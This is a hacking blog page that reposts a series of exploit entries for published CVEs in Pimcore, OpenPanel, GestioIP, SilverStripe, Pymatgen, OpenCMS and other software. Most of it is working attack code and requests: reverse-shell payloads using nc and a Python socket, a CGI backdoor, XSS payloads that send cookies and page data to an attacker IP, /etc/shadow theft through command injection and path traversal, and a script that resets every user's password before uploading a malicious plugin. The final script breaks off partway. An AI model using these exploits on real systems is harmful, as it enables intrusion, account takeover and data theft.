Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863574634

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Pimcore customer-data-framework 4.2.0 -  SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956

import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)

if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")

    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")
            
# Exploit Title: OpenPanel 0.3.4 - Incorrect Access Control
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /files/../.. HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyEag.70MOWk6Q4cZWoRbciZO94dsGxgw
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
            
# Exploit Title: OpenPanel 0.3.4 - Directory Traversal 
# Date: Dec 05, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53537

### Compress Function ###
POST /compress_files HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

archiveName=/home/stefan/test/test3&selectedFiles%5B%5D=shadow&pathParam=../../etc&extension=tar

### Copy Function ###
POST /copy_item?item_name=shadow&path_param=/etc&item_type=text%2Fplain&destination_path=/home/stefan/ HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Content-Length: 0
Te: trailers


###  Download Function ###
GET /download_file/shadow?path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers


### View Function ### 
GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
            
# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search
Document
# Google Dork: N/A
# Date: 1/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
# CVE:  CVE-2024-11954

---

### Description:
A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
Object Classification Store functionality. The vulnerability arises due to
insufficient input sanitization, allowing an authenticated attacker with
access to the classification store to inject malicious JavaScript code.
This code is then executed in the context of other users' browsers when
they view the affected data.

### Proof of Concept (PoC):
1. Log in to the Pimcore backend as a user with access to the Data Object
Classification Store.
2. Navigate to the Classification Store and create or edit a key.
3. Inject the following payload into the key value:
   ```html
   <script>alert('XSS')</script>
4. Save the file and view it in the frontend or backend. The JavaScript
alert will execute, demonstrating the vulnerability.
            
# Exploit Title: OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53582

GET /view_file?filename=shadow&path_param=/etc HTTP/2
Host: demo.openpanel.org:2083
Cookie: session=eyJ1c2VyX2lkIjoxfQ.ZyyFtw.LmzkwVp2FF_x2AkdK5DVKigeef8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/files/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
            
# Exploit Title: OpenPanel 0.3.4 - OS Command Injection 
# Date: Nov 25, 2024
# Exploit Author: Korn Chaisuwan, Punthat Siriwan, Pongtorn Angsuchotmetee 
# Vendor Homepage: https://openpanel.com/
# Software Link: https://openpanel.com/
# Version: 0.3.4
# Tested on: macOS
# CVE : CVE-2024-53584

POST /server/timezone HTTP/2
Host: demo.openpanel.org:2083
Cookie: minimenu=0; session=eyJfZnJlc2giOmZhbHNlLCJ1c2VyX2lkIjozfQ.ZyyaKQ.HijWQTQ_I0yftDYEqqqqRR_FuRU; theme=dark
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.openpanel.org:2083/server/timezone
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://demo.openpanel.org:2083
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

timezone=;cat+/etc/shadow+>+/home/stefan/secret.txt
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must be enabled previously.


### Usage

To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.


### File: payload.html
#### example: editing user named 'maxi'


<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Welcome to our site</title>
<style>
body {
font-family: Arial, sans-serif;
text-align: center;
}
.container {
margin-top: 50px;
}
iframe {
display: none;
}
</style>
</head>
<body>
<div class="container">
<h1>Thank you for visiting our site!</h1>
<p>We are processing your request, please wait a moment...</p>
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
</div>
<!-- hidden iframe -->

<iframe name="hiddenFrame"></iframe>

<!-- The form that makes the POST to GestioIP Server -->
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
<input type="hidden" name="name" value="maxi">
<input type="hidden" name="group_id" value="1">
<input type="hidden" name="email" value="maxi@test.com">
<input type="hidden" name="phone" value="123">
<input type="hidden" name="comment" value="">
<input type="hidden" name="client_id" value="1">
<input type="hidden" name="id" value="2">
<input type="hidden" name="B2" value="">
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
            
# Exploit Title: SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605

## Explanation:
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.

## Requirements
1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.

## On the attacker server:
1. Create an html file with oembded information:
```
<html>
  <head>
    <link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
  </head>
  <body>
    <img src="media.jpg">
  </body>
</html>
```
2. Create the json file with XSS payload:
```
{
    "title": "Title",
    "author_name": "author",
    "type": "video",
    "height": 113,
    "width": 200,
    "version": "1.0",
    "provider_name": "FakeSite",
    "thumbnail_height": 360,
    "thumbnail_width": 480,
    "thumbnail_url": "http://<attacker_server_ip>/media.jpg",
    "html":"<script>alert('hello world');</script>"
}
```
3. The media.jpg file can be any image.
4. Host these files on a publicly available website

## On the SilverStripe website:
1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email: max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50861

### Description

The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.

### Prerequisites

1. Enable "DNS Key" Feature
First, ensure that "Dynamic DNS updates" is enabled in the global configuration:

Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes

This will enable the following menus:

    Manage > DNS Keys
    Manage > DNS Update User

2. Create a DNS Key Entry

To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission.

Also, you can configure this permission to any group under:

Manage > User Groups > Manage Sites and Categories

3. Enter payload.

Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.


### Payloads

1 - Test basic XSS

<script>alert("test")</script>


2 - Send data (cookies) to the attacker's server

<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">


3 - Redirect the user to a malicious site

<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">
            
# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50859

### Description

The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
Proper input validation and output encoding are critical to prevent this vulnerability.


### Prerequisites

Enable (set to 'yes') the parameter:

Manage > Manage GestioIP > ACL connection management


### Usage

Select: import/export > Import ACLs/ACL Connections

Select: "Connection List"

Select "report only"

Browse to select the file you want to upload.

Click 'upload'



### Payloads

#### 1) html file to upload

<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>


#### 2) js file to exfiltrate data

var req1 = new XMLHttpRequest();
req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
req1.send();

response = req1.responseText;

var req2 = new XMLHttpRequest();
req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
req2.setRequestHeader('Content-Type', 'text/html');
req2.send(response);
            
# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()
            
# Exploit Title: Unrestricted File Upload
# Google Dork:
# Date: 14/Nov/2024
# Exploit Author: d3sca
# Vendor Homepage:
https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link:
https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 0.1
# Tested on: Debian Linux
# CVE : CVE-2024-52302


# Steps to Reproduce:

# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).

# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link.

# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.
# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.


import requests
import argparse
import sys


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def login(url, username, password):
    """Authenticate with the API and return the Bearer token."""
    login_endpoint = f"{url}/api/v1/user/login"
    headers = {"Content-Type": "application/json"}
    payload = {
        "username": username,
        "password": password
    }

    try:
        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
        response.raise_for_status()

        # Extract token
        token = response.json().get("token")
        if not token:
            print("[!] Token not found in response. Exiting.")
            sys.exit(1)

        print("[+] Authentication successful. Token acquired.")
        return token
    except Exception as e:
        print(f"[!] Login failed: {e}")
        sys.exit(1)

def upload_file(url, token, file_path):
    """Upload a file to the profile picture endpoint using the Bearer token."""
    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
    headers = {
        "Authorization": f"Bearer {token}"
    }
    files = {
        "file": open(file_path, "rb")
    }

    try:
        response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
        response.raise_for_status()

        if response.status_code == 200:
            print("[+] File uploaded successfully.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[!] Failed to upload file. Status code: {response.status_code}")
            print(f"[!] Response: {response.text}")
    except Exception as e:
        print(f"[!] File upload failed: {e}")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
    parser.add_argument("-u", "--username", required=True, help="Username for login")
    parser.add_argument("-p", "--password", required=True, help="Password for login")
    parser.add_argument("-f", "--file", required=True, help="File to upload")
    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")

    args = parser.parse_args()

    # Authenticate 
    token = login(args.url, args.username, args.password)

    # Upload the file
    upload_file(args.url, token, args.file)

if __name__ == "__main__":
    main()
            
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-48760

import requests
import sys

# Config
username = "gipadmin"
password = "PASSWORD"
domain = "localhost"
local_ip = "10.20.0.1"
local_port = 443
target_url = f"http://{domain}/gestioip/api/upload.cgi"

# CGI Backdoor Perl
backdoor_code = """#!/usr/bin/perl -w

use strict;

print "Cache-Control: no-cache\\n";
print "Content-type: text/html\\n\\n";

my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g; 
$req =~ s/%3b/;/g;
$req =~ s/%7c/|/gi;
$req =~ s/%27/'/g;
$req =~ s/%22/"/g;
$req =~ s/%5D/]/g;
$req =~ s/%5B/[/g;

print "<html><body>";
print '<!-- CGI backdoor -->';

if (!$req) {
    print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
} else {
    print "Executing: $req";
}

print "<pre>";
my @cmd = `$req`;
print "</pre>";

foreach my $line (@cmd) {
    print $line . "<br/>";
}

print "</body></html>";
"""

# Exploit functions
def upload_file(session, file_name, file_data):
    """Uploads the file to the server"""
    files = {
        'file_name': (None, file_name),
        'leases_file': (file_name, file_data)
    }
    response = session.post(target_url, files=files)
    if "OK" not in response.text:
        print(f"[!] Error uploading {file_name}.")
        sys.exit(1)
    return response

def run_command(session, cmd):
    """Execute a command in the server through the vuln"""
    url = target_url + '?' + cmd
    resp = session.get(url)
    print(resp.text)

def backdoor_exists(session):
    """Verifies if backdoor is already uploaded or not"""
    response = session.get(target_url + "?whoami")
    if "www-data" in response.text:
        return True  # backdoor already uploaded
    return False  # backdoor not uploaded yet

if __name__ == '__main__':
    with requests.Session() as session:
        session.auth = (username, password)

        # Verify if backdoor is already uploaded
        if not backdoor_exists(session):
            print("\n[!] Uploading backdoor...\n")
            upload_file(session, 'upload.cgi', backdoor_code)
        else:
            print("\n[+] Backdoor already uploaded. Continue...\n")

        # Execute the reverse shell
        print("\n[!] Executing reverse shell...\n")
        reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
        run_command(session, reverse_shell_cmd)
            
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email (max.cybersecurity at belino.com)
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50857

### Description

The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.

### Prerequisites

To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:

• Show backuped device configurations (read_device_config_perm)
• Upload device configurations (write_device_config_perm)
• Administrate CM (administrative_cm_perm)



1) vulnerable parameter: `host_id`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'


2) vulnerable parameter: `stored_config`

http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'
            
# Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS)
# Date: 24-11-2024
# Exploit Author: Siddhartha Naik
# Vendor Homepage: http://www.opencms.org/en/
# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1
# Affected Version: 17.0
# Category: WebApps
# Tested on: Windows 11
# CVE : CVE-2024-41447

1. Vendor Description:

OpenCms from Alkacon Software is a professional, easy to use website
content management system. OpenCms helps content managers worldwide to
create and maintain beautiful websites fast and efficiently.

2. Technical Description:

This is a Stored XSS vulnerability in the author field seen when publishing an article.
 This vulnerability has been tested on latest versions of Brave and Firefox browsers.
 It is believed to affect any user who clicks on the "Read More" button of the affected article and
 can be exploited by any user who is able to modify/create articles.

3. Proof Of Concept:

a)  Start by creating a new article. In the author field write your script like so:

<script>alert(1)</script>

b)  Save and publish the article
c)  The user who clicks on the read more button gets a popup saying '1' 

4. Solution:

Upgrade to latest release.
http://www.opencms.org/en/home/news.html

5. Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447            
https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf
http://alkacon.com
http://opencms.com
            
# Exploit Title: Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)
# Date: 2024-11-24
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.adaptlearning.org/
# Software Link: https://github.com/adaptlearning/adapt_authoring
# Version: 0.11.3
# CVE Identifier: CVE-2024-50672 , CVE-2024-50671

import io
import sys
import json
import zipfile
import argparse
import requests
import textwrap


def get_session_cookie(username, password):
    data = {"email": username, "password": password}
    res = requests.post(f"{args.url}/api/login", data=data)

    if res.status_code == 200:
        print(f"[+] Login as {username}")
        return res.cookies.get_dict()

    return None


def get_users():
    session_cookie = get_session_cookie(args.username, args.password)
    if session_cookie is None:
        print("[-] Login failed")
        sys.exit()

    res = requests.get(f"{args.url}/api/user", cookies=session_cookie)
    users = [
        {"email": user["email"], "role": user["roles"][0]["name"]}
        for user in json.loads(res.text)
    ]

    roles = {"Authenticated User": 1, "Course Creator": 2, "Super Admin": 3}
    users.sort(key=lambda user: roles[user["role"]])
    for user in users:
        print(f"[+] {user['email']} ({user['role']})")

    return users


def reset_password(users):
    # Overwrite potentially expired password reset tokens
    for user in users:
        data = {"email": user["email"]}
        requests.post(f"{args.url}/api/createtoken", data=data)
    print("[+] Generate password reset token for every user")

    valid_characters = "0123456789abcdef"
    next_tokens = ["^"]

    # Ensure that only a single result is returned at a time
    while next_tokens:
        prev_tokens = next_tokens
        next_tokens = []

        for token in prev_tokens:
            for ch in valid_characters:
                data = {"token": {"$regex": token + ch}, "password": "HaXX0r3d!"}
                res = requests.put(
                    f"{args.url}/api/userpasswordreset/w00tw00t",
                    json=data,
                )

                # Multiple results returned
                if res.status_code == 500:
                    next_tokens.append(token + ch)

    print("[+] Reset every password to HaXX0r3d!")


def create_plugin(plugin_name):
    manifest = {
        "name": plugin_name,
        "version": "1.0.0",
        "extension": "exploit",
        "main": "/js/main.js",
        "displayName": "exploit",
        "keywords": ["adapt-plugin", "adapt-extension"],
        "scripts": {"adaptpostcopy": "/scripts/postcopy.js"},
    }

    property = {
        "properties": {
            "pluginLocations": {
                "type": "object",
                "properties": {"course": {"type": "object"}},
            }
        }
    }

    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    module.exports = async function (fs, path, log, options, done) {{
      try {{
        exec("{args.command}");
      }} catch (err) {{
        log(err);
      }}
      done();
    }};
    """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        zip_file.writestr(
            f"{plugin_name}/bower.json",
            io.BytesIO(json.dumps(manifest).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/properties.schema",
            io.BytesIO(json.dumps(property).encode()).getvalue(),
        )
        zip_file.writestr(
            f"{plugin_name}/js/main.js", io.BytesIO("".encode()).getvalue()
        )
        zip_file.writestr(
            f"{plugin_name}/scripts/postcopy.js",
            io.BytesIO(payload.encode()).getvalue(),
        )

    plugin.seek(0)
    return plugin


def find_plugin(cookies, plugin_type, plugin_name):
    res = requests.get(f"{args.url}/api/{plugin_type}type", cookies=cookies)
    for plugin in json.loads(res.text):
        if plugin["name"] == plugin_name:
            return plugin["_id"]

    return None


def create_course(cookies):
    data = {}
    res = requests.post(f"{args.url}/api/content/course", cookies=cookies, json=data)
    course_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": course_id}
    res = requests.post(
        f"{args.url}/api/content/contentobject",
        cookies=cookies,
        json=data,
    )
    content_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": content_id}
    res = requests.post(f"{args.url}/api/content/article", cookies=cookies, json=data)
    article_id = json.loads(res.text)["_id"]

    data = {"_courseId": course_id, "_parentId": article_id}
    res = requests.post(f"{args.url}/api/content/block", cookies=cookies, json=data)
    block_id = json.loads(res.text)["_id"]

    component_id = find_plugin(cookies, "component", "adapt-contrib-text")

    data = {
        "_courseId": course_id,
        "_parentId": block_id,
        "_component": "text",
        "_componentType": component_id,
    }
    requests.post(f"{args.url}/api/content/component", cookies=cookies, json=data)

    return course_id


def rce(users):
    session_cookie = None
    for user in users:
        if user["role"] == "Super Admin":
            session_cookie = get_session_cookie(user["email"], "HaXX0r3d!")
            break

    if session_cookie is None:
        print("[-] Failed to login as Super Account")
        sys.exit()

    plugin_name = "adapt-contrib-xapi"
    print(f"[+] Create malicious plugin : {plugin_name}")
    plugin = create_plugin(plugin_name)

    print("[+] Scan installed plugins")
    plugin_id = find_plugin(session_cookie, "extension", plugin_name)
    if plugin_id is None:
        print(f"[+] {plugin_name} not found")
    else:
        print(f"[+] Found {plugin_name}")
        print(f"[+] Remove {plugin_name}")
        requests.delete(
            f"{args.url}/api/extensiontype/{plugin_id}",
            cookies=session_cookie,
        )

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(
        f"{args.url}/api/upload/contentplugin",
        cookies=session_cookie,
        files=files,
    )

    print("[+] Find uploaded plugin")
